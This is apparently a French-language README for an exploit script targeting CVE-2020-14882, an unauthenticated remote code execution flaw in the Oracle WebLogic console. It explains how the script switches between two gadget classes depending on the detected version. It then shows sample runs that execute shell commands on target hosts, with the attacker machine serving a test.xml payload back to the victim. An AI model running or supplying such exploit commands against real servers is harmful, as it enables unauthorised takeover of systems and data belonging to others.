
CVE-2020-14882
CVE-2020-14882
Vulnérabilité dans le produit Oracle WebLogic Server d'Oracle Fusion Middleware (composant : Console). Les versions prises en charge qui sont affectées sont 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 et 14.1.1.0.0. Une vulnérabilité facilement exploitable permet à un attaquant non authentifié disposant d'un accès réseau via HTTP de compromettre Oracle WebLogic Server. Des attaques réussies de cette vulnérabilité peuvent entraîner la prise de contrôle d'Oracle WebLogic
Pour les versions d'Oracle WebLogic antérieures à 12.2.1, il faut utiliser la classe 'com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext' car la classe 'com.tangosol.coherence.mvel2.sh.ShellSession' n'est pas disponible. Le script alterne automatiquement entre les deux classes pour l'exécution de commandes en fonction des versions détectées.
Certains des scripts actuels disponibles sur Github pour exploiter CVE-2020-14882 ne prennent en charge que la classe 'com.tangosol.coherence.mvel2.sh.ShellSession', ce qui signifie que les scripts échoueront sur les versions WebLogic 10.3.6.0.0 et 12.1.3.0.0.
% python3 CVE-2020-14882.py -u http://172.16.164.134:7001 -c 'uname -r > /tmp/success' -i 172.16.164.1
[*] http://172.16.164.134:7001/console/login/LoginForm.jsp [version 12.1.3.0.0]
[*] Using: com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext
172.16.164.134 - - [25/Feb/2021 20:55:36] "GET /test.xml); HTTP/1.1" 200 -
172.16.164.134 - - [25/Feb/2021 20:55:36] "GET /test.xml); HTTP/1.1" 200 -
172.16.164.134 - - [25/Feb/2021 20:55:36] "GET /test.xml); HTTP/1.1" 200 -
% python3 CVE-2020-14882.py -u http://127.0.0.1:7001 -c 'uname -r' -i 172.16.164.1
http://127.0.0.1:7001/console/login/LoginForm.jsp
[*] http://127.0.0.1:7001/console/login/LoginForm.jsp [version 12.2.1.3.0]
[*] Using: com.tangosol.coherence.mvel2.sh.ShellSession
Linux 96fc5d43736b 4.19.121-linuxkit #1 SMP Tue Dec 1 17:50:32 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux